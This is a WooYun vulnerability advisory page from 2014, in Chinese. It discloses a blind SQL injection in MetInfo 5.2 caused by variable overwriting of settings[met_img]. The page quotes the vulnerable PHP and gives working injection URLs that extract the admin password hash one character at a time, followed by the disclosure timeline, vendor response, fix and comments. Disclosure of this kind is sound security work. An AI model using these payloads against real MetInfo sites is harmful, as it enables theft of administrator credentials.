当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(19) 关注此漏洞

缺陷编号: WooYun-2014-48203

漏洞标题: MetInfo最新版SQL盲注漏洞

相关厂商: Metinfo企业网站管理系统

漏洞作者: 進撃のDanny

提交时间: 2014-01-09 19:36

公开时间: 2014-04-07 19:37

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php源码审核 sql注射漏洞利用技巧 php源码分析 白盒测试

5人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-09: 细节已通知厂商并且等待厂商处理中
2014-01-12: 厂商已经确认,细节仅向厂商公开
2014-01-15: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-03-08: 细节向核心白帽子及相关领域专家公开
2014-03-18: 细节向普通白帽子公开
2014-03-28: 细节向实习白帽子公开
2014-04-07: 细节向公众公开

简要描述:

MetInfo最新版SQL盲注漏洞,可盲注管理员信息。

详细说明:

D:\www\php\MetInfo5.2\img\img.php

code 区域
<?php
# MetInfo Enterprise Content Management System
# Copyright (C) MetInfo Co.,Ltd (http://**.**.**.**). All rights reserved.
require_once '../include/common.inc.php';
$mdname = 'img';
$showname = 'showimg';
$dbname = $met_img;
$dbname_list = $met_img_list;
$mdmendy = 1;
$imgproduct = 'img';
require_once '../include/global/listmod.php';
$img_listnow = $modlistnow;
$img_list_new = $md_list_new;
$img_class_new = $md_class_new;
$img_list_com = $md_list_com;
$img_class_com = $md_class_com;
$img_class = $md_class;
$img_list = $md_list;
require_once '../public/php/imghtml.inc.php';
include template('img');
footer();
# This program is an open source system, commercial use, please consciously to purchase commercial license.
# Copyright (C) MetInfo Co., Ltd. (http://**.**.**.**). All rights reserved.
?>



第7行$dbname可以覆盖此变量

http://localhost/case/?settings[met_img]=met_admin_table%20or%201=1 --

QQ截图20140107184719.png



来到文件

D:\www\php\MetInfo5.2\include\global\listmod.php

code 区域
require_once substr(dirname(__FILE__), 0, -6).'common.inc.php';
require_once '../include/global/pseudo.php';
if($dbname!=$met_download&&$dbname!=$met_img&&$dbname!=$met_news&&$dbname!=$met_product){okinfo('../404.html');exit();}
if($class_list[$class1]['module']>=100||($class1==0&&$class2==0&&$class3==0)){
if($search=="search"){
$search_module=$imgproduct=='product'?3:5;
$query="select * from $met_column where module='$search_module' and (classtype=1 or releclass!=0) and lang='$lang' order by no_order ASC,id ASC";
$search_coloumn=$db->get_all($query);
$class1=$search_coloumn[0]['id'];
}else{



接着进入数据库查询即可导致注入。

漏洞证明:

打开页面

http://localhost/case/?settings[met_img]=met_admin_table where substr(left((admin_pass),32),1,1)=char(56)-- 1

-----返回空白

http://localhost/case/?settings[met_img]=met_admin_table where substr(left((admin_pass),32),1,1)=char(55)-- 1

-----返回案例

通过返回的信息可以盲注出管理员信息。

t01995df10741cf85f4.jpg

修复方案:

修复变量覆盖

版权声明:转载请注明来源 進撃のDanny@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-01-12 11:34

厂商回复:

CNVD通过本地实例复现,暂未在互联网上有实例复现,由CNVD联系软件生产厂商,向其通报漏洞情况。如后续有互联网实例,也可以进一步提交。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共3人评价):
登陆后才能进行评分
66.7%
33.4%
0%
0%
0%

评价

  1. 2014-01-07 20:53 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:88888 | WooYun认证√)
    2

    mark

  2. 2014-01-07 22:02 | saline ( 普通白帽子 | Rank:294 漏洞数:37 | Focus On Web Secur1ty)
    2

    还能注的出来?

  3. 2014-01-11 15:13 | 進撃のDanny ( 普通白帽子 | Rank:146 漏洞数:14 | )
    1

    @xsser 没想到Metinfo是走的第三方,不得不说这速度也太慢了。

  4. 2014-02-04 20:07 | BadCat ( 实习白帽子 | Rank:81 漏洞数:21 | 悲剧的我什么都不会)
    1

    mark 话说metinfo明明把全部请求过滤了,竟然还能够注入!!

  5. 2014-04-07 23:16 | 小城 ( 路人 | Rank:28 漏洞数:8 | 低调,才能活的长久)
    1

    厉害

  6. 2014-04-07 23:22 | 小城 ( 路人 | Rank:28 漏洞数:8 | 低调,才能活的长久)
    0

    自己写的工具

  7. 2014-04-08 10:02 | wangy3e ( 路人 | Rank:0 漏洞数:1 | web security,mobile app security)
    0

    厉害

  8. 2014-04-18 15:39 | pangshenjie ( 普通白帽子 | Rank:110 漏洞数:14 )
    1

    屌、收藏、

登录后才能发表评论,请先 登录